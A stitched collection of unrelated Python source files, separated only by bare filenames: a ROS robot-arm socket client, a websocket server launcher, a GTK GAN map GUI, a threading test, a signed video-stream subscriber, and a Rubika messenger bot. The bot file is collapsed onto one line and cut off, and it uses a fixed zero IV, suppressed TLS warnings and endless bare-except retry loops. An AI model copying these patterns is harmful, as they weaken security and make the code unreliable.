    `case` variable (harmless here because the outer loop always breaks, but
    fragile). Also, `data` is local to this function; if no case matched it
    would be unbound at the final Socket.send() — confirm every reachable
    action value is covered.
    """
    global arm_mode_flag,speed_mode_flag,point_data_flag
    if arm_mode_flag == True:
        arm_mode_flag = False
        speed_mode_flag = False
        point_data_flag = False
        for case in switch(socket_cmd.action):
            #-------PtP Mode--------
            if case(Taskcmd.Action_Type.PtoP):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                break
            #-------Line Mode--------
            if case(Taskcmd.Action_Type.Line):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                break
            #-------set arm speed--------
            if case(Taskcmd.Action_Type.SetVel):
                data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                break
            #-------set arm delay time--------
            if case(Taskcmd.Action_Type.Delay):
                data = TCP.SetDelay(socket_cmd.grip,0)
                break
            #-------set arm fast / safe speed mode--------
            if case(Taskcmd.Action_Type.Mode):
                data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                break
        socket_cmd.action= 5 ## reset to the initial/idle mode state
        Socket.send(data.encode('utf-8'))# socket send; encoded for the str-based protocol

##-----------socket client--------
def socket_client():
    """Connect to the arm controller and pump its feedback messages.

    Byte [2] of each feedback packet is the busy flag ('0' ready, '1' busy,
    '6' strategy finished); byte [4] is the send-acknowledge flag. Both are
    relayed to the ROS services. Loops until the controller reports shutdown.
    """
    global Socket,Arm_feedback,data,Socket_sent_flag
    try:
        Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(Socket.recv(1024))
    #start_input=int(input('開始傳輸請按1,離開請按3 : '))  # prompt: press 1 to start, 3 to quit
    start_input = 1
    if start_input==1:
        while 1:
            feedback_str = Socket.recv(1024)  # arm controller sends its state
            # NOTE(review): `str(feedback_str[2]) == '48'` compares the
            # *decimal byte value* as text (48 == ord('0')) — py3-specific.
            if str(feedback_str[2]) == '48':# '0': arm is Ready for the next motion command
                Arm_feedback = 0
                socket_client_arm_state(Arm_feedback)
                #print("isbusy false")
            if str(feedback_str[2]) == '49':# '1': arm is busy, cannot take a new command
                Arm_feedback = 1
                socket_client_arm_state(Arm_feedback)
                #print("isbusy true")
            if str(feedback_str[2]) == '54':# '6': strategy finished
                Arm_feedback = 6
                socket_client_arm_state(Arm_feedback)
                print("shutdown")
            # check the send-acknowledge flag
            if str(feedback_str[4]) == '48':# returned 0 -> false
                print(2222222222)
                Socket_sent_flag = False
                socket_client_sent_flag(Socket_sent_flag)
            if str(feedback_str[4]) == '49':# returned 1 -> true
                print(111111111111)
                Socket_sent_flag = True
                socket_client_sent_flag(Socket_sent_flag)
            feedback_check = TCP.feedback_check()
            Socket.send(feedback_check.encode('utf-8'))# socket send; encoded for the str-based protocol
            ##---------------send arm command over the socket end-----------------
            if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
                break
    if start_input == 3:
        rospy.on_shutdown(myhook)
    rospy.on_shutdown(myhook)
    Socket.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##

## multithreading
def thread_test():
    # Thread target: runs the blocking socket client loop.
    socket_client()
## multithreading end

def myhook():
    print ("shutdown time!")

if __name__ == '__main__':
    socket_cmd.action = 5## reset to the initial/idle mode state
    t = threading.Thread(target=thread_test)
    t.start() # start the client thread
    socket_server()
    t.join()

# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / [  Indent/outdent line
# ===== webxterm.py =====
import os
import sys
import socket
import platform

from threading import Thread

# Make the package root importable when this file is run directly.
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../')

from lib.server import websocketserver

# Control-channel endpoint used to stop a running server / query its health.
shutdown_bind_address = "localhost"
shutdown_port = 8898
# Public websocket endpoint.
bind_address = "0.0.0.0"
port = 8899
# In-band control sequences exchanged over the shutdown socket.
shutdown_command = b"\x1b[^shutdown\x1b\\"
check_health_command = b'\x1b[^Hello\x1b\\'
reply_health_command = b'\x1b[^Hi\x1b\\'

__author__ = 'liaobaikai <baikai.liao@qq.com>'
__version__ = '0.3'
__status__ = "production"
__date__ = "2019-11-18(created) -> 2020-02-10(updated)"


def shutdown():
    """Connect to the control port and ask the running server to shut down."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        try:
            conn.connect((shutdown_bind_address, shutdown_port))
            conn.sendall(shutdown_command)
        except ConnectionRefusedError:
            print('ERROR: Could not contact [%s:%s]. Server may not be running.' % (shutdown_bind_address, shutdown_port))


def check_server():
    """Probe the control port and report whether the main server answers the health handshake."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        try:
            conn.connect((shutdown_bind_address, shutdown_port))
            conn.sendall(check_health_command)
            if conn.recv(64) == reply_health_command:
                print('Server running...')
        except ConnectionRefusedError:
            print('Server not running!')


def startup():
    """Create the websocket server, bind it, and serve until interrupted."""
    server = websocketserver.WebSocketServer(
        (bind_address, port), websocketserver.WebSocketServerRequestHandler)
    # Fails early if the port is already in use.
    server.server_activate()
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print('shutdown server...')

        def shutdown_server():
            server.sd_server.shutdown()
            server.shutdown()

        # shutdown() must not be called from the thread running serve_forever(),
        # so hand it off to a helper thread.
        Thread(target=shutdown_server).start()

# Former PID-file based force-kill, kept for reference:
# def kill():
#     if os.path.exists(get_pid_file()) is False:
#         print("PID file not exists!")
#         return
#     with open(get_pid_file()) as f:
#         pid = f.read()
#     try:
#         os.kill(int(pid), signal.SIGTERM)
#        except ProcessLookupError as ple:
#            print(ple)
#        finally:
#            try:
#                os.remove(get_pid_file())
#            except OSError:
#                pass


if __name__ == '__main__':
    if len(sys.argv) > 1:
        commands = sys.argv[-1]
        # 'start' and 'run' are currently synonyms (daemonizing is disabled).
        if commands == 'start':
            startup()
        elif commands == 'run':
            startup()
        elif commands == 'stop':
            shutdown()
        # elif commands == 'stop-force':
        #     kill()
        elif commands == 'version':
            try:
                # platform.platform() typically looks like
                # "Linux-5.4.0-x86_64-with-glibc2.31"; fewer than three
                # dash-separated parts triggers the generic fallback below.
                fs = platform.platform().split('-')
                os_name = fs[0]
                os_version = fs[1]
                architecture = fs[2]
            # BUG FIX: indexing a short list raises IndexError, not ValueError,
            # so the fallback branch was unreachable; catch both.
            except (ValueError, IndexError):
                os_name = platform.platform(aliased=True, terse=True)
                os_version = platform.version()
                architecture = platform.architecture()[0]
            print('Server version: ', __version__)
            print('OS Name: ', os_name)
            print('OS Version: ', os_version)
            print('Architecture: ', architecture)
            print('Python build: ', platform.python_build()[0])
        elif commands == 'status':
            # Ask the running server (if any) to answer the health handshake.
            check_server()
        else:
            print('Usage: webxterm ( commands ... )')
            print('commands:')
            print(' run: Start Server in the current window')
            print(' start: Start Server in a separate window')
            print(' stop: Stop Server, waiting up to 5 seconds for the process to end')
            print(' status: View running Server status')
            print(' version: What version of server are you running?')
    else:
        # No argument: run the server in the foreground.
        startup()
threaded_gui.py
from gi.repository import Gtk, Gdk, GdkPixbuf
from citygan import CityGan
from time import process_time
import numpy as np
import citygan_util
import threading, queue
import os
import pix2pix_citygenerator


class GanCities(Gtk.Window):
    """Main window: generate city maps with either the GAN or the pix2pix model."""

    def __init__(self):
        super(GanCities, self).__init__()
        try:
            self.generator = CityGan()
            self.pix2pix = pix2pix_citygenerator.pix2pix_citygen()
        except OSError:
            print("Models should be loaded in ./models/")
            print("Failed to load modules. Exiting gracefully.")
            exit(1)
        self.current_model = 0
        # Start with a flat grey 256x256 RGB placeholder image.
        self.map_data = np.full(fill_value=192, shape=[256, 256, 3])
        self.map_array = self.map_data.astype(np.uint8)
        # BUG FIX: height argument was shape[1] (width); harmless for the
        # square placeholder but wrong for non-square data.
        self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(),
                                                     GdkPixbuf.Colorspace.RGB, False, 8,
                                                     self.map_data.shape[1],
                                                     self.map_data.shape[0],
                                                     self.map_data.shape[1] * 3)
        self.q = queue.Queue()
        thread = threading.Thread(target=self.get_work)
        thread.daemon = True
        thread.start()
        self.initialize_ui()

    def get_work(self):
        # NOTE(review): q.put() receives the *return value* of handlers that
        # already ran on the calling thread, so this daemon thread only drains
        # (None) results — confirm before relying on it for real off-loading.
        while True:
            self.q.get()

    def initialize_ui(self):
        """Build all widgets, wire up signals, and show the window."""
        # Top-level layout: options notebook on the left, image on the right.
        self.horiz_box = Gtk.Box()
        self.resize(600, 400)
        self.options_book = Gtk.Notebook()
        self.model_select_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.gan_options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.pix2pix_options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.options_book.append_page(child=self.gan_options_box,
                                      tab_label=Gtk.Label(label="GanCities"))
        self.options_book.append_page(child=self.pix2pix_options_box,
                                      tab_label=Gtk.Label(label="pix2pix"))
        self.image_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.appstatus = Gtk.Label(label="")
        self.appstatus.set_xalign(0.0)
        self.horiz_box.pack_start(self.options_book, False, True, 10)
        self.horiz_box.pack_start(self.image_box, True, True, 10)
        self.set_title("GanCities")
        self.connect("check_resize", self.on_check_resize)
        self.connect("delete-event", Gtk.main_quit)

        # Image display area; painted manually in on_draw().
        self.image_area = Gtk.Image()
        self.image_area.connect("draw", self.on_draw)
        self.image_box.pack_start(self.image_area, True, True, 10)

        # GAN tab buttons. Save buttons stay disabled until a map exists.
        self.gan_generate_button = Gtk.Button(label="Make a map")
        self.gan_generate_button.connect("clicked", self.gan_generate_clicked)
        self.gan_save_button = Gtk.Button(label="Save Map")
        self.gan_save_button.connect("clicked", self.save_map_clicked)
        self.gan_save_button.set_sensitive(False)

        # pix2pix tab buttons.
        self.pix2pix_save_button = Gtk.Button(label="Save Map")
        self.pix2pix_save_button.connect("clicked", self.save_map_clicked)
        self.pix2pix_save_button.set_sensitive(False)
        self.load_button = Gtk.Button(label="Load PNG")
        self.load_button.connect("clicked", self.on_load_clicked)
        self.pix2pix_generate_button = Gtk.Button(label="Make a Map")
        self.pix2pix_generate_button.connect("clicked", self.pix2pix_generate_clicked)

        # Packing.
        self.gan_options_box.pack_start(self.gan_generate_button, False, True, 10)
        self.gan_options_box.pack_end(self.gan_save_button, False, True, 10)
        self.pix2pix_options_box.pack_start(self.load_button, False, True, 10)
        self.pix2pix_options_box.pack_start(self.pix2pix_generate_button, False, True, 10)
        self.pix2pix_options_box.pack_end(self.pix2pix_save_button, False, True, 10)
        self.image_box.pack_end(self.appstatus, False, False, 0)
        self.add(self.horiz_box)
        self.show_all()
        self.set_status("Started successfully")

    # ---- resizing -------------------------------------------------------

    def on_check_resize(self, window):
        allocation = self.image_area.get_allocation()
        self.image_area.set_allocation(allocation)
        self.q.put(self.resizeImage(allocation.width, allocation.height))

    def resizeImage(self, x, y):
        """Rescale the current pixbuf to x*y and schedule a redraw."""
        self.scale_pixbuf = self.pixbuf.scale_simple(x, y, GdkPixbuf.InterpType.BILINEAR)
        # Clear the widget; on_draw() paints the scaled pixbuf directly.
        self.image_area.set_from_pixbuf(None)
        self.image_area.queue_draw()

    def on_draw(self, win, cr):
        Gdk.cairo_set_source_pixbuf(cr, self.scale_pixbuf, 5, 5)
        cr.paint()

    # ---- GAN model ------------------------------------------------------

    def gan_generate_clicked(self, widget):
        try:
            start = process_time()
            self.q.put(self.get_map())
            finish = process_time()
            self.set_status("Map Generated", finish - start)
        # Narrowed from a bare except: (which also caught SystemExit).
        except Exception:
            self.set_status("Map Generation Failed")

    def get_map(self):
        """Generate a new GAN map and display it."""
        self.map_data = self.generator.generate_map()
        self.map_array = self.map_data.astype(np.uint8)
        self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(),
                                                     GdkPixbuf.Colorspace.RGB, False, 8,
                                                     self.map_data.shape[1],
                                                     self.map_data.shape[0],
                                                     self.map_data.shape[1] * 3)
        # BUG FIX: previously displayed the stale scale_pixbuf from the last
        # resize; mirror pix2pix_generate and show the fresh pixbuf.
        self.scale_pixbuf = self.pixbuf
        self.gan_save_button.set_sensitive(True)
        self.pix2pix_generate_button.set_sensitive(False)
        self.pix2pix_save_button.set_sensitive(False)
        self.image_area.set_from_pixbuf(self.scale_pixbuf)

    # ---- saving ---------------------------------------------------------

    def save_map_clicked(self, widget):
        try:
            self.q.put(self.save_map(widget))
        except OSError:
            self.set_status("File save failed. Check your filename and try again.")
        except Exception:
            self.set_status("File save failed! General Error.")
            raise

    def save_map(self, widget):
        save_dialog = Gtk.FileChooserDialog(title="Save Map", action=Gtk.FileChooserAction.SAVE)
        save_dialog.add_buttons(Gtk.STOCK_SAVE, Gtk.ResponseType.OK,
                                Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)
        save_dialog.connect("response", self.save_response)
        save_dialog.run()

    def save_response(self, dialog, response):
        current_page = self.options_book.get_current_page()
        if response == Gtk.ResponseType.OK:
            filename = dialog.get_filename()
            if current_page == 0:  # NEEDS TO BE UPDATED IF ADDITIONAL MODELS ARE ADDED
                self.generator.save_generated_map(self.map_data, filename)
            elif current_page == 1:
                self.pix2pix.saveImage(self.map_data, filename)
            dialog.destroy()
            # BUG FIX: the success message used to run unconditionally after
            # the if/else, raising NameError on cancel (filename unbound).
            self.set_status(os.path.basename(filename) + " saved successfully")
        else:
            self.set_status("Save cancelled")
            dialog.destroy()

    # ---- pix2pix model --------------------------------------------------

    def on_load_clicked(self, widget):
        try:
            self.q.put(self.on_load(widget))
        except OSError:
            self.set_status("Loading file failed! Check filename and try again.")
        except Exception:
            self.set_status("Loading file failed!")

    def on_load(self, widget):
        png_filter = Gtk.FileFilter()
        png_filter.set_name("PNG File")
        png_filter.add_mime_type("image/png")
        load_dialog = Gtk.FileChooserDialog(title="Select a png", action=Gtk.FileChooserAction.OPEN)
        load_dialog.add_buttons(Gtk.STOCK_OPEN, Gtk.ResponseType.OK,
                                Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)
        load_dialog.add_filter(png_filter)
        load_dialog.connect("response", self.load_response)
        load_dialog.run()

    def load_response(self, dialog, response):
        if response == Gtk.ResponseType.OK:
            filename = dialog.get_filename()
            self.pix2pix_generate_button.set_sensitive(True)
            self.pix2pix_save_button.set_sensitive(True)
            self.pix2pix.loadImage(filename)
            dialog.destroy()
            self.set_status(os.path.basename(filename) + " loaded")
        else:
            dialog.destroy()
            self.set_status("Loading cancelled")

    def pix2pix_generate_clicked(self, widget):
        try:
            start = process_time()
            self.q.put(self.pix2pix_generate(widget))
            finish = process_time()
            self.set_status("Map generated", finish - start)
        except Exception:
            self.set_status("Map generation failed")

    def pix2pix_generate(self, widget):
        """Run the pix2pix model on the loaded image and display the result."""
        self.map_data = self.pix2pix.genImage()
        # Model output is in [0, 1]; expand to displayable 8-bit RGB.
        self.map_array = citygan_util.mapRangeToRange(self.map_data, [0, 1], [0, 255]).astype(np.uint8)
        self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(),
                                                     GdkPixbuf.Colorspace.RGB, False, 8,
                                                     self.map_data.shape[1],
                                                     self.map_data.shape[0],
                                                     self.map_data.shape[1] * 3)
        self.scale_pixbuf = self.pixbuf
        self.pix2pix_save_button.set_sensitive(True)
        self.gan_save_button.set_sensitive(False)
        self.image_area.set_from_pixbuf(self.scale_pixbuf)

    def set_status(self, string, time=None):
        """Show a status line, optionally with an elapsed-time suffix."""
        full_string = "Application Status: " + string
        if time is not None:
            full_string = full_string + " | Time taken: " + str(round(time, 3)) + " seconds"
        self.appstatus.set_label(full_string)


def main():
    application = GanCities()
    Gtk.main()


if __name__ == "__main__":
    main()
test_two_threads_resume.py
from threading import Thread, RLock
from time import sleep

# Shared re-entrant lock both workers contend for.
lock = RLock()


def foo():
    """Repeatedly take the shared lock, hold it briefly, then report."""
    sleep(1)  # give both threads time to start before contending
    while True:
        with lock:
            value = 12
            sleep(0.01)
        # Report outside the critical section; the lock is already released.
        print("finished foo()", value)


threads = [Thread(target=foo, name="Thread1"), Thread(target=foo, name="Thread2")]
for worker in threads:
    worker.start()
videoStramSubscriber2.py
import sys
import socket
import traceback
import cv2
from imutils.video import VideoStream
import imagezmq
import threading
import numpy as np
import time
import cv2
from nacl.signing import VerifyKey


class VideoStreamSubscriber:
    """Receive JPEG frames over imagezmq on background threads.

    One daemon thread (_run) pulls raw frames off the wire; a second
    (_run2) verifies the outsourcer's signature on each frame and
    preprocesses it for inference. Consumers call receive2() to get a
    ready-to-use (batch, name, original_image) tuple.
    """

    def __init__(self, hostname, port, merkle_tree_interval, contractHash,
                 minimum_receive_rate_from_contractor, vk, input_size):
        self.hostname = hostname
        self.port = port
        self._stop = False
        self._data = ''
        self._data2 = ''
        self._data_ready = threading.Event()
        self._data2_ready = threading.Event()
        self._thread = threading.Thread(target=self._run, args=())
        self._thread2 = threading.Thread(
            target=self._run2,
            args=(merkle_tree_interval, contractHash,
                  minimum_receive_rate_from_contractor, vk, input_size))
        self._thread.daemon = True
        self._thread2.daemon = True
        self._thread.start()
        self._thread2.start()

    def receive(self, timeout=15.0):
        """Block until a raw (name, jpg_bytes) frame arrives, or raise TimeoutError."""
        flag = self._data_ready.wait(timeout=timeout)
        if not flag:
            raise TimeoutError(
                "Contract aborted: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) +
                'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review')
        self._data_ready.clear()
        return self._data

    def _run(self):
        # Subscriber-side hub; REQ_REP=False selects the PUB/SUB transport.
        receiver = imagezmq.ImageHub("tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False)
        print('here6')
        while not self._stop:
            self._data = receiver.recv_jpg()
            self._data_ready.set()
        receiver.close()

    def _run2(self, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk, input_size):
        while not self._stop:
            name, compressed = self.receive()
            decompressedImage = cv2.imdecode(
                np.frombuffer(compressed, dtype='uint8'), -1)
            if name == 'abort':
                sys.exit('Contract aborted by outsourcer according to custom')
            if merkle_tree_interval == 0:
                # Signature covers the frame bytes + contract hash + the two
                # trailing counter fields appended to `name`.
                try:
                    vk.verify(bytes(compressed) + contractHash + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2]))
                # BUG FIX: narrowed from a bare `except:`, which also
                # swallowed SystemExit/KeyboardInterrupt.
                except Exception:
                    sys.exit(
                        'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review')
            else:
                # Merkle mode: signature additionally covers interval and
                # random-number fields (last five elements of `name`).
                try:
                    vk.verify(bytes(compressed) + contractHash + bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5]))
                except Exception:
                    sys.exit(
                        'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review')
            # Preprocess: BGR->RGB, resize to the model input size, scale to
            # [0, 1], and add a batch dimension of 1.
            original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB)
            image_data = cv2.resize(original_image, (input_size, input_size))
            image_data = image_data / 255.
            images_data = np.asarray([image_data]).astype(np.float32)
            self._data2 = (images_data, name, original_image)
            self._data2_ready.set()

    def receive2(self, timeout=15.0):
        """Block until a preprocessed (batch, name, original_image) tuple is ready."""
        flag = self._data2_ready.wait(timeout=timeout)
        if not flag:
            raise TimeoutError(
                "Contract aborted11: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) +
                'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review')
        self._data2_ready.clear()
        return self._data2

    def close(self):
        """Signal both worker threads to exit their loops."""
        self._stop = True


# Simulating heavy processing load
def limit_to_2_fps():
    # BUG FIX: `sleep` was never in scope (the `from time import sleep`
    # import is commented out), so this raised NameError; use time.sleep.
    time.sleep(0.5)
bot.py
import asyncio import base64 import concurrent.futures import datetime import glob import json import math import os import pathlib import random import sys import time from json import dumps, loads from random import randint import re from re import findall import requests import urllib3 from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from requests import post from googletrans import Translator from bidi.algorithm import get_display from mutagen.mp3 import MP3 from gtts import gTTS from threading import Thread urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) from difflib import SequenceMatcher def similar(a, b): return SequenceMatcher(None, a, b).ratio() #lisence by bahman ahmadi this classes #this classes opened sourse and free class encryption: def __init__(self, auth): self.key = bytearray(self.secret(auth), "UTF-8") self.iv = bytearray.fromhex('00000000000000000000000000000000') def replaceCharAt(self, e, t, i): return e[0:t] + i + e[t + len(i):] def secret(self, e): t = e[0:8] i = e[8:16] n = e[16:24] + t + e[24:32] + i s = 0 while s < len(n): e = n[s] if e >= '0' and e <= '9': t = chr((ord(e[0]) - ord('0') + 5) % 10 + ord('0')) n = self.replaceCharAt(n, s, t) else: t = chr((ord(e[0]) - ord('a') + 9) % 26 + ord('a')) n = self.replaceCharAt(n, s, t) s += 1 return n def encrypt(self, text): raw = pad(text.encode('UTF-8'), AES.block_size) aes = AES.new(self.key, AES.MODE_CBC, self.iv) enc = aes.encrypt(raw) result = base64.b64encode(enc).decode('UTF-8') return result def decrypt(self, text): aes = AES.new(self.key, AES.MODE_CBC, self.iv) dec = aes.decrypt(base64.urlsafe_b64decode(text.encode('UTF-8'))) result = unpad(dec, AES.block_size).decode('UTF-8') return result class Bot: def __init__(self, auth): self.auth = auth self.enc = encryption(auth) def sendMessage(self, chat_id, text, message_id=None): if message_id == None: t = False while t == False: try: p = 
post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/") p = loads(self.enc.decrypt(p.json()["data_enc"])) t = True except: t = False return p else: t = False while t == False: try: p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/") p = loads(self.enc.decrypt(p.json()["data_enc"])) t = True except: t = False return p def deleteMessages(self, chat_id, message_ids): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"deleteMessages", "input":{ "object_guid":chat_id, "message_ids":message_ids, "type":"Global" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c66.iranlms.ir/") def requestFile(self, name, size , mime): o = '' while str(o) != '<Response [200]>': o = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"requestSendFile", "input":{ "file_name":name, "size":size, "mime":mime }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c66.iranlms.ir/") try: k = loads(self.enc.decrypt(o.json()["data_enc"])) if k['status'] != 'OK' or k['status_det'] != 'OK': o = '502' except: o = '502' return k['data'] def fileUpload(self, bytef 
,hash_send ,file_id ,url): if len(bytef) <= 131072: h = { 'auth':self.auth, 'chunk-size':str(len(bytef)), 'file-id':str(file_id), 'access-hash-send':hash_send, 'total-part':str(1), 'part-number':str(1) } t = False while t == False: try: j = post(data=bytef,url=url,headers=h).text j = loads(j)['data']['access_hash_rec'] t = True except: t = False return j else: t = len(bytef) / 131072 t += 1 t = random._floor(t) for i in range(1,t+1): if i != t: k = i - 1 k = k * 131072 t2 = False while t2 == False: try: o = post(data=bytef[k:k + 131072],url=url,headers={ 'auth':self.auth, 'chunk-size':str(131072), 'file-id':file_id, 'access-hash-send':hash_send, 'total-part':str(t), 'part-number':str(i) }).text o = loads(o)['data'] t2 = True except: t2 = False j = k + 131072 j = round(j / 1024) j2 = round(len(bytef) / 1024) print(str(j) + 'kb / ' + str(j2) + ' kb') else: k = i - 1 k = k * 131072 t2 = False while t2 == False: try: p = post(data=bytef[k:],url=url,headers={ 'auth':self.auth, 'chunk-size':str(len(bytef[k:])), 'file-id':file_id, 'access-hash-send':hash_send, 'total-part':str(t), 'part-number':str(i) }).text p = loads(p)['data']['access_hash_rec'] t2 = True except: t2 = False j2 = round(len(bytef) / 1024) print(str(j2) + 'kb / ' + str(j2) + ' kb') return p def sendFile(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } 
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def sendImage(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, 
